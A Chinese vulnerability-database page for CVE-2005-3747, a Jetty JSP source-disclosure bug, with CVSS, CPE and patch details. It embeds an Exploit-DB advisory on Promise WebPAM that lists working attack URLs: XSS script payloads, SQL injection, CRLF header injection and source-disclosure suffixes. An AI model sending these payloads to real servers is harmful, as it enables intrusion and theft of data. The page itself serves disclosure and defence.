CVE-2005-3747
CVSS5.0
发布时间 :2005-11-22 06:03:00
修订时间 :2011-05-06 00:00:00
NMCOE    

[原文]Unspecified vulnerability in Jetty before 5.1.6 allows remote attackers to obtain source code of JSP pages, possibly involving requests for .jsp files with URL-encoded backslash ("%5C") characters. NOTE: this might be the same issue as CVE-2006-2758.


[CNNVD]Jetty URL编码的反斜杠源代码泄露漏洞(CNNVD-200511-345)

        Jetty是一个开源、基于标准、全功能实现的JAVA服务器。
        Jetty 5.1.6之前版本中未明的漏洞,可让远程攻击者获取JSP页面的源代码,这可能与请求具有URL编码的反斜杠("%5C")字符的.jsp文件有关

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-200 [信息暴露]

- CPE (受影响的平台与产品)

cpe:/a:mortbay:jetty:2.2:beta1Mortbay Jetty 2.2 beta1
cpe:/a:mortbay:jetty:4.1.3Mortbay Jetty 4.1.3
cpe:/a:mortbay:jetty:4.2.27Mortbay Jetty 4.2.27
cpe:/a:mortbay:jetty:4.2.15:rc0Mortbay Jetty 4.2.15 RC0
cpe:/a:mortbay:jetty:2.1.1Mortbay Jetty 2.1.1
cpe:/a:mortbay:jetty:4.2.0Mortbay Jetty 4.2.0
cpe:/a:mortbay:jetty:5.0.0Mortbay Jetty 5.0.0
cpe:/a:mortbay:jetty:4.0:rc1Mortbay Jetty 4.0 RC1
cpe:/a:mortbay:jetty:5.1.5:rc1Mortbay Jetty 5.1.5 RC1
cpe:/a:mortbay:jetty:4.1.b0Mortbay Jetty 4.1.b0
cpe:/a:mortbay:jetty:3.1.1Mortbay Jetty 3.1.1
cpe:/a:mortbay:jetty:3.1.9Mortbay Jetty 3.1.9
cpe:/a:mortbay:jetty:2.2.3Mortbay Jetty 2.2.3
cpe:/a:mortbay:jetty:2.0.5Mortbay Jetty 2.0.5
cpe:/a:mortbay:jetty:5.1.0Mortbay Jetty 5.1.0
cpe:/a:mortbay:jetty:2.1.0Mortbay Jetty 2.1.0
cpe:/a:mortbay:jetty:4.2Mortbay Jetty 4.2
cpe:/a:mortbay:jetty:4.1.0:rc5Mortbay Jetty 4.1.0 RC5
cpe:/a:mortbay:jetty:4.2.11Mortbay Jetty 4.2.11
cpe:/a:mortbay:jetty:4.2.4:rc0Mortbay Jetty 4.2.4 RC0
cpe:/a:mortbay:jetty:5.0:rc3Mortbay Jetty 5.0 RC3
cpe:/a:mortbay:jetty:3.0.2Mortbay Jetty 3.0.2
cpe:/a:mortbay:jetty:4.1.b1Mortbay Jetty 4.1.b1
cpe:/a:mortbay:jetty:4.2.8_01Mortbay Jetty 4.2.8_01
cpe:/a:mortbay:jetty:2.2.0Mortbay Jetty 2.2.0
cpe:/a:mortbay:jetty:4.0:rc2Mortbay Jetty 4.0 RC2
cpe:/a:mortbay:jetty:4.1.0:rc1Mortbay Jetty 4.1.0 RC1
cpe:/a:mortbay:jetty:3.0.1Mortbay Jetty 3.0.1
cpe:/a:mortbay:jetty:5.0.0:rc0Mortbay Jetty 5.0.0 RC0
cpe:/a:mortbay:jetty:2.4.2Mortbay Jetty 2.4.2
cpe:/a:mortbay:jetty:3.0.a95Mortbay Jetty 3.0.a95
cpe:/a:mortbay:jetty:4.0.d3Mortbay Jetty 4.0.d3
cpe:/a:mortbay:jetty:2.0.0Mortbay Jetty 2.0.0
cpe:/a:mortbay:jetty:3.1.4Mortbay Jetty 3.1.4
cpe:/a:mortbay:jetty:5.1.11:rc0Mortbay Jetty 5.1.11 RC0
cpe:/a:mortbay:jetty:4.0.d4Mortbay Jetty 4.0.d4
cpe:/a:mortbay:jetty:2.0:beta1Mortbay Jetty 2.0 beta1
cpe:/a:mortbay:jetty:4.0.d0Mortbay Jetty 4.0.d0
cpe:/a:mortbay:jetty:1.3.2Mortbay Jetty 1.3.2
cpe:/a:mortbay:jetty:3.1:rc5Mortbay Jetty 3.1 RC5
cpe:/a:mortbay:jetty:4.0:rc3Mortbay Jetty 4.0 RC3
cpe:/a:mortbay:jetty:5.0:rc1Mortbay Jetty 5.0 RC1
cpe:/a:mortbay:jetty:3.0.a92Mortbay Jetty 3.0.a92
cpe:/a:mortbay:jetty:2.1.2Mortbay Jetty 2.1.2
cpe:/a:mortbay:jetty:4.2.1Mortbay Jetty 4.2.1
cpe:/a:mortbay:jetty:5.0:beta2Mortbay Jetty 5.0 beta2
cpe:/a:mortbay:jetty:3.0.0:rc2Mortbay Jetty 3.0.0 RC2
cpe:/a:mortbay:jetty:3.0.a94Mortbay Jetty 3.0.a94
cpe:/a:mortbay:jetty:3.1.6Mortbay Jetty 3.1.6
cpe:/a:mortbay:jetty:4.2.14:rc1Mortbay Jetty 4.2.14 RC1
cpe:/a:mortbay:jetty:3.0.0:rc3Mortbay Jetty 3.0.0 RC3
cpe:/a:mortbay:jetty:4.2.10:pre0Mortbay Jetty 4.2.10 pre0
cpe:/a:mortbay:jetty:2.0.3Mortbay Jetty 2.0.3
cpe:/a:mortbay:jetty:3.1:rc4Mortbay Jetty 3.1 RC4
cpe:/a:mortbay:jetty:2.4.5Mortbay Jetty 2.4.5
cpe:/a:mortbay:jetty:4.0.1:rc1Mortbay Jetty 4.0.1 RC1
cpe:/a:mortbay:jetty:2.0.2Mortbay Jetty 2.0.2
cpe:/a:mortbay:jetty:4.0.6Mortbay Jetty 4.0.6
cpe:/a:mortbay:jetty:4.0.0Mortbay Jetty 4.0.0
cpe:/a:mortbay:jetty:4.1.d2Mortbay Jetty 4.1.d2
cpe:/a:mortbay:jetty:2.2.8Mortbay Jetty 2.2.8
cpe:/a:mortbay:jetty:4.2.17Mortbay Jetty 4.2.17
cpe:/a:mortbay:jetty:5.1.5:rc2Mortbay Jetty 5.1.5 RC2
cpe:/a:mortbay:jetty:4.2.22Mortbay Jetty 4.2.22
cpe:/a:mortbay:jetty:3.0.b03Mortbay Jetty 3.0.b03
cpe:/a:mortbay:jetty:2.3.0aMortbay Jetty 2.3.0a
cpe:/a:mortbay:jetty:3.1:rc9Mortbay Jetty 3.1 RC9
cpe:/a:mortbay:jetty:2.4.1Mortbay Jetty 2.4.1
cpe:/a:mortbay:jetty:3.1.0Mortbay Jetty 3.1.0
cpe:/a:mortbay:jetty:3.0.a5Mortbay Jetty 3.0.a5
cpe:/a:mortbay:jetty:1.3.4Mortbay Jetty 1.3.4
cpe:/a:mortbay:jetty:2.2:beta2Mortbay Jetty 2.2 beta2
cpe:/a:mortbay:jetty:4.2.14:rc0Mortbay Jetty 4.2.14 RC0
cpe:/a:mortbay:jetty:2.3.0Mortbay Jetty 2.3.0
cpe:/a:mortbay:jetty:4.2.12Mortbay Jetty 4.2.12
cpe:/a:mortbay:jetty:4.0.b2Mortbay Jetty 4.0.b2
cpe:/a:mortbay:jetty:1.0Mortbay Jetty 1.0
cpe:/a:mortbay:jetty:2.1.b1Mortbay Jetty 2.1.b1
cpe:/a:mortbay:jetty:3.1.7Mortbay Jetty 3.1.7
cpe:/a:mortbay:jetty:4.1.0:rc3Mortbay Jetty 4.1.0 RC3
cpe:/a:mortbay:jetty:4.2.14Mortbay Jetty 4.2.14
cpe:/a:mortbay:jetty:3.0.b04Mortbay Jetty 3.0.b04
cpe:/a:mortbay:jetty:5.1.4Mortbay Jetty 5.1.4
cpe:/a:mortbay:jetty:3.1:rc8Mortbay Jetty 3.1 RC8
cpe:/a:mortbay:jetty:3.0.3Mortbay Jetty 3.0.3
cpe:/a:mortbay:jetty:2.2:alpha0Mortbay Jetty 2.2 alpha0
cpe:/a:mortbay:jetty:4.0.4Mortbay Jetty 4.0.4
cpe:/a:mortbay:jetty:2.2.4Mortbay Jetty 2.2.4
cpe:/a:mortbay:jetty:3.0.0:rc6Mortbay Jetty 3.0.0 RC6
cpe:/a:mortbay:jetty:3.0.a1Mortbay Jetty 3.0.a1
cpe:/a:mortbay:jetty:2.0:alpha1Mortbay Jetty 2.0 alpha1
cpe:/a:mortbay:jetty:4.2.0:rc0Mortbay Jetty 4.2.0 RC0
cpe:/a:mortbay:jetty:4.2.7Mortbay Jetty 4.2.7
cpe:/a:mortbay:jetty:1.1.1Mortbay Jetty 1.1.1
cpe:/a:mortbay:jetty:2.4.4Mortbay Jetty 2.4.4
cpe:/a:mortbay:jetty:4.1.1Mortbay Jetty 4.1.1
cpe:/a:mortbay:jetty:5.1.1:rc0Mortbay Jetty 5.1.1 RC0
cpe:/a:mortbay:jetty:4.0.b0Mortbay Jetty 4.0.b0
cpe:/a:mortbay:jetty:4.0.5Mortbay Jetty 4.0.5
cpe:/a:mortbay:jetty:2.3.1Mortbay Jetty 2.3.1
cpe:/a:mortbay:jetty:4.2.2Mortbay Jetty 4.2.2
cpe:/a:mortbay:jetty:4.1.0:rc4Mortbay Jetty 4.1.0 RC4
cpe:/a:mortbay:jetty:4.2.9Mortbay Jetty 4.2.9
cpe:/a:mortbay:jetty:3.1:rc6Mortbay Jetty 3.1 RC6
cpe:/a:mortbay:jetty:3.0.0:rc1Mortbay Jetty 3.0.0 RC1
cpe:/a:mortbay:jetty:3.0.a93Mortbay Jetty 3.0.a93
cpe:/a:mortbay:jetty:4.1.d1Mortbay Jetty 4.1.d1
cpe:/a:mortbay:jetty:2.0.4Mortbay Jetty 2.0.4
cpe:/a:mortbay:jetty:5.1.2Mortbay Jetty 5.1.2
cpe:/a:mortbay:jetty:4.2.9:rc2Mortbay Jetty 4.2.9 RC2
cpe:/a:mortbay:jetty:3.1:rc3Mortbay Jetty 3.1 RC3
cpe:/a:mortbay:jetty:3.0.0:rc7Mortbay Jetty 3.0.0 RC7
cpe:/a:mortbay:jetty:2.1.3Mortbay Jetty 2.1.3
cpe:/a:mortbay:jetty:1.3.1Mortbay Jetty 1.3.1
cpe:/a:mortbay:jetty:3.1.2Mortbay Jetty 3.1.2
cpe:/a:mortbay:jetty:4.0.b1Mortbay Jetty 4.0.b1
cpe:/a:mortbay:jetty:3.0.b02Mortbay Jetty 3.0.b02
cpe:/a:mortbay:jetty:4.2.24:rc1Mortbay Jetty 4.2.24 RC1
cpe:/a:mortbay:jetty:3.0.a8Mortbay Jetty 3.0.a8
cpe:/a:mortbay:jetty:2.4.8Mortbay Jetty 2.4.8
cpe:/a:mortbay:jetty:5.1.2:pre0Mortbay Jetty 5.1.2 pre0
cpe:/a:mortbay:jetty:5.0:alpha3Mortbay Jetty 5.0 alpha3
cpe:/a:mortbay:jetty:4.1.0:rc0Mortbay Jetty 4.1.0 RC0
cpe:/a:mortbay:jetty:4.0.d1Mortbay Jetty 4.0.d1
cpe:/a:mortbay:jetty:3.0.b05Mortbay Jetty 3.0.b05
cpe:/a:mortbay:jetty:3.0.a91Mortbay Jetty 3.0.a91
cpe:/a:mortbay:jetty:3.0.a0Mortbay Jetty 3.0.a0
cpe:/a:mortbay:jetty:4.2.18Mortbay Jetty 4.2.18
cpe:/a:mortbay:jetty:5.0:rc4Mortbay Jetty 5.0 RC4
cpe:/a:mortbay:jetty:2.2:alpha1Mortbay Jetty 2.2 alpha1
cpe:/a:mortbay:jetty:4.2.10Mortbay Jetty 4.2.10
cpe:/a:mortbay:jetty:4.2.9:rc1Mortbay Jetty 4.2.9 RC1
cpe:/a:mortbay:jetty:5.1.4:rc0Mortbay Jetty 5.1.4 RC0
cpe:/a:mortbay:jetty:5.0:beta1Mortbay Jetty 5.0 beta1
cpe:/a:mortbay:jetty:2.1.5Mortbay Jetty 2.1.5
cpe:/a:mortbay:jetty:4.0.1Mortbay Jetty 4.0.1
cpe:/a:mortbay:jetty:5.1.3Mortbay Jetty 5.1.3
cpe:/a:mortbay:jetty:3.1:rc2Mortbay Jetty 3.1 RC2
cpe:/a:mortbay:jetty:5.0:rc2Mortbay Jetty 5.0 RC2
cpe:/a:mortbay:jetty:4.2.15Mortbay Jetty 4.2.15
cpe:/a:mortbay:jetty:3.1.3Mortbay Jetty 3.1.3
cpe:/a:mortbay:jetty:2.1.6Mortbay Jetty 2.1.6
cpe:/a:mortbay:jetty:4.2.24Mortbay Jetty 4.2.24
cpe:/a:mortbay:jetty:4.1.0:rc6Mortbay Jetty 4.1.0 RC6
cpe:/a:mortbay:jetty:1.0.1Mortbay Jetty 1.0.1
cpe:/a:mortbay:jetty:5.0:beta0Mortbay Jetty 5.0 beta0
cpe:/a:mortbay:jetty:2.2.5Mortbay Jetty 2.2.5
cpe:/a:mortbay:jetty:3.0.6Mortbay Jetty 3.0.6
cpe:/a:mortbay:jetty:4.2.3Mortbay Jetty 4.2.3
cpe:/a:mortbay:jetty:3.0Mortbay Jetty 3.0
cpe:/a:mortbay:jetty:2.3.2Mortbay Jetty 2.3.2
cpe:/a:mortbay:jetty:3.0.a4Mortbay Jetty 3.0.a4
cpe:/a:mortbay:jetty:4.2.16Mortbay Jetty 4.2.16
cpe:/a:mortbay:jetty:3.1.5Mortbay Jetty 3.1.5
cpe:/a:mortbay:jetty:5.0:alpha0Mortbay Jetty 5.0 alpha0
cpe:/a:mortbay:jetty:2.2:beta0Mortbay Jetty 2.2 beta0
cpe:/a:mortbay:jetty:3.0.5Mortbay Jetty 3.0.5
cpe:/a:mortbay:jetty:3.0.b01Mortbay Jetty 3.0.b01
cpe:/a:mortbay:jetty:2.0.1Mortbay Jetty 2.0.1
cpe:/a:mortbay:jetty:3.0.a9Mortbay Jetty 3.0.a9
cpe:/a:mortbay:jetty:4.2.0:rc1Mortbay Jetty 4.2.0 RC1
cpe:/a:mortbay:jetty:2.1.4Mortbay Jetty 2.1.4
cpe:/a:mortbay:jetty:2.2.6Mortbay Jetty 2.2.6
cpe:/a:mortbay:jetty:3.1:rc0Mortbay Jetty 3.1 RC0
cpe:/a:mortbay:jetty:4.2.10:pre2Mortbay Jetty 4.2.10 pre2
cpe:/a:mortbay:jetty:3.0.0Mortbay Jetty 3.0.0
cpe:/a:mortbay:jetty:4.2.21Mortbay Jetty 4.2.21
cpe:/a:mortbay:jetty:4.0.1:rc0Mortbay Jetty 4.0.1 RC0
cpe:/a:mortbay:jetty:5.0:alpha2Mortbay Jetty 5.0 alpha2
cpe:/a:mortbay:jetty:2.4.7Mortbay Jetty 2.4.7
cpe:/a:mortbay:jetty:2.2:beta3Mortbay Jetty 2.2 beta3
cpe:/a:mortbay:jetty:1.3.0Mortbay Jetty 1.3.0
cpe:/a:mortbay:jetty:2.1.7Mortbay Jetty 2.1.7
cpe:/a:mortbay:jetty:4.0.d2Mortbay Jetty 4.0.d2
cpe:/a:mortbay:jetty:5.1Mortbay Jetty 5.1
cpe:/a:mortbay:jetty:2.3.5Mortbay Jetty 2.3.5
cpe:/a:mortbay:jetty:3.0.a97Mortbay Jetty 3.0.a97
cpe:/a:mortbay:jetty:4.2.10:pre1Mortbay Jetty 4.2.10 pre1
cpe:/a:mortbay:jetty:5.1.5:rc0Mortbay Jetty 5.1.5 RC0
cpe:/a:mortbay:jetty:3.0.a3Mortbay Jetty 3.0.a3
cpe:/a:mortbay:jetty:2.4.0Mortbay Jetty 2.4.0
cpe:/a:mortbay:jetty:4.2.5Mortbay Jetty 4.2.5
cpe:/a:mortbay:jetty:3.1.8Mortbay Jetty 3.1.8
cpe:/a:mortbay:jetty:4.0.3Mortbay Jetty 4.0.3
cpe:/a:mortbay:jetty:5.1.1Mortbay Jetty 5.1.1
cpe:/a:mortbay:jetty:2.0:beta2Mortbay Jetty 2.0 beta2
cpe:/a:mortbay:jetty:2.1.b0Mortbay Jetty 2.1.b0
cpe:/a:mortbay:jetty:4.1.d0Mortbay Jetty 4.1.d0
cpe:/a:mortbay:jetty:2.4.6Mortbay Jetty 2.4.6
cpe:/a:mortbay:jetty:3.0.0:rc5Mortbay Jetty 3.0.0 RC5
cpe:/a:mortbay:jetty:2.0:alpha2Mortbay Jetty 2.0 alpha2
cpe:/a:mortbay:jetty:4.2.20:rc0Mortbay Jetty 4.2.20 RC0
cpe:/a:mortbay:jetty:2.2:beta4Mortbay Jetty 2.2 beta4
cpe:/a:mortbay:jetty:4.2.19Mortbay Jetty 4.2.19
cpe:/a:mortbay:jetty:2.2.7Mortbay Jetty 2.2.7
cpe:/a:mortbay:jetty:2.4.9Mortbay Jetty 2.4.9
cpe:/a:mortbay:jetty:3.0.0:rc4Mortbay Jetty 3.0.0 RC4
cpe:/a:mortbay:jetty:4.2.26Mortbay Jetty 4.2.26
cpe:/a:mortbay:jetty:5.1.1:rc1Mortbay Jetty 5.1.1 RC1
cpe:/a:mortbay:jetty:3.0.a7Mortbay Jetty 3.0.a7
cpe:/a:mortbay:jetty:3.0.a99Mortbay Jetty 3.0.a99
cpe:/a:mortbay:jetty:2.3.3Mortbay Jetty 2.3.3
cpe:/a:mortbay:jetty:4.1.2Mortbay Jetty 4.1.2
cpe:/a:mortbay:jetty:2.2.1Mortbay Jetty 2.2.1
cpe:/a:mortbay:jetty:3.0.a90Mortbay Jetty 3.0.a90
cpe:/a:mortbay:jetty:4.2.23Mortbay Jetty 4.2.23
cpe:/a:mortbay:jetty:3.0.a96Mortbay Jetty 3.0.a96
cpe:/a:mortbay:jetty:2.3.4Mortbay Jetty 2.3.4
cpe:/a:mortbay:jetty:1.2.0Mortbay Jetty 1.2.0
cpe:/a:mortbay:jetty:5.0:alpha1Mortbay Jetty 5.0 alpha1
cpe:/a:mortbay:jetty:5.1.5Mortbay Jetty 5.1.5
cpe:/a:mortbay:jetty:5.1.3:rc1Mortbay Jetty 5.1.3 RC1
cpe:/a:mortbay:jetty:4.1.4Mortbay Jetty 4.1.4
cpe:/a:mortbay:jetty:3.0.a2Mortbay Jetty 3.0.a2
cpe:/a:mortbay:jetty:3.1:rc1Mortbay Jetty 3.1 RC1
cpe:/a:mortbay:jetty:4.1.0:rc2Mortbay Jetty 4.1.0 RC2
cpe:/a:mortbay:jetty:4.2.23:rc0Mortbay Jetty 4.2.23 RC0
cpe:/a:mortbay:jetty:3.0.4Mortbay Jetty 3.0.4
cpe:/a:mortbay:jetty:4.2.20Mortbay Jetty 4.2.20
cpe:/a:mortbay:jetty:4.2.24:rc0Mortbay Jetty 4.2.24 RC0
cpe:/a:mortbay:jetty:4.2.25Mortbay Jetty 4.2.25
cpe:/a:mortbay:jetty:2.4.3Mortbay Jetty 2.4.3
cpe:/a:mortbay:jetty:4.0.2Mortbay Jetty 4.0.2
cpe:/a:mortbay:jetty:5.1.3:rc3Mortbay Jetty 5.1.3 RC3
cpe:/a:mortbay:jetty:3.0.0:rc8Mortbay Jetty 3.0.0 RC8
cpe:/a:mortbay:jetty:4.2.6Mortbay Jetty 4.2.6
cpe:/a:mortbay:jetty:4.1.0Mortbay Jetty 4.1.0
cpe:/a:mortbay:jetty:1.1Mortbay Jetty 1.1
cpe:/a:mortbay:jetty:5.1.3:rc0Mortbay Jetty 5.1.3 RC0
cpe:/a:mortbay:jetty:4.0.1:rc2Mortbay Jetty 4.0.1 RC2
cpe:/a:mortbay:jetty:3.1:rc7Mortbay Jetty 3.1 RC7
cpe:/a:mortbay:jetty:1.3.3Mortbay Jetty 1.3.3
cpe:/a:mortbay:jetty:3.0.a98Mortbay Jetty 3.0.a98
cpe:/a:mortbay:jetty:4.2.0:beta0Mortbay Jetty 4.2.0 beta0
cpe:/a:mortbay:jetty:5.1.3:rc4Mortbay Jetty 5.1.3 RC4
cpe:/a:mortbay:jetty:1.3.5Mortbay Jetty 1.3.5
cpe:/a:mortbay:jetty:3.0.a6Mortbay Jetty 3.0.a6
cpe:/a:mortbay:jetty:4.2.4Mortbay Jetty 4.2.4
cpe:/a:mortbay:jetty:5.1.3:rc2Mortbay Jetty 5.1.3 RC2
cpe:/a:mortbay:jetty:2.2.2Mortbay Jetty 2.2.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3747
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3747
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-345
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15515
(PATCH)  BID  15515
http://sourceforge.net/project/shownotes.php?release_id=372086&group_id=7322
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=372086&group_id=7322
http://secunia.com/advisories/17659
(VENDOR_ADVISORY)  SECUNIA  17659
http://www.vupen.com/english/advisories/2005/2515
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2515
http://www.securityfocus.com/archive/1/archive/1/450315/100/0/threaded
(UNKNOWN)  HP  SSRT061269
http://www.securityfocus.com/archive/1/archive/1/450315/100/0/threaded
(UNKNOWN)  HP  SSRT061269
http://secunia.com/advisories/22669
(VENDOR_ADVISORY)  SECUNIA  22669

- 漏洞信息

Jetty URL编码的反斜杠源代码泄露漏洞
中危 输入验证
2005-11-22 00:00:00 2005-11-23 00:00:00
远程  
        Jetty是一个开源、基于标准、全功能实现的JAVA服务器。
        Jetty 5.1.6之前版本中未明的漏洞,可让远程攻击者获取JSP页面的源代码,这可能与请求具有URL编码的反斜杠("%5C")字符的.jsp文件有关

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        Jetty Jetty 5.15
        Jetty jetty-5.1.6.zip
        http://prdownloads.sourceforge.net/jetty/jetty-5.1.6.zip

- 漏洞信息 (18571)

Promise WebPAM v2.2.0.13 Multiple Remote Vulnerabilities (EDBID:18571)
php webapps
2012-03-07 Not Verified
0 LiquidWorm
N/A [点击下载]
Promise WebPAM v2.2.0.13 Multiple Remote Vulnerabilities


Vendor: Promise Technology, Inc.
Product web page: http://www.promise.com
Affected version: 2.2.0.13

Summary: WebPAM is a web based Promise Array Management Software
that's easy-to use, designed to simplify RAID storage management.
WebPAM is specifically designed for Promise HBA. WebPAM can configure,
manage or monitor Promise RAID products remotely from a web browser
from anywhere in the world.

Desc: Input passed via the parameters 'entSortOrder' and 'entSort' in
'ent_i.jsp' script are not properly sanitised before being returned to
the user or used in SQL queries. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code. The parameters 'startTime' and
'endTime' in 'ent_i.jsp' are vulnerable to a XSS issue where the attacker
can execute arbitrary HTML and script code in a user's browser session in
context of an affected site. The parameter 'userID' in 'usr_ent.jsp' and
'usr_t.jsp' is vulnerable to HTTP Response Splitting which can be exploited
to insert arbitrary HTTP headers, which are included in a response sent to
the user.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Jetty/4.2.23 (Windows XP/5.1 x86 java/1.4.2)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5077
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5077.php


28.02.2012

---



#1 (XSS):
---------

https://labpc:8443/promise/ent_i.jsp?startTime=<script>alert("ZSL");</script>
https://labpc:8443/promise/ent_i.jsp?endTime=<script>alert("ZSL");</script>


#2 (SQLi):
----------

https://labpc:8443/promise/ent_i.jsp?entSortOrder=desc%27
https://labpc:8443/promise/ent_i.jsp?entSort=time%27
https://labpc:8443/promise/tools/sqlrun.jsp?sqlstr=[QUERY SQLi]


#3 (CRLFi):
-----------

https://labpc:8443/promise/usr_ent.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://labpc:8443/promise/usr_t.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection


#4 (SCD):
---------

Ref: http://secunia.com/advisories/17659

https://labpc:8443/promise/index.jsp%00
https://labpc:8443/promise/index.jsp%20
https://labpc:8443/promise/index.jsp%5C
https://labpc:8443/promise/index.jsp#
https://labpc:8443/promise/index.jsp\
		

- 漏洞信息

21000
Jetty Unspecified JSP Source Code Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-11-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 5.1.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站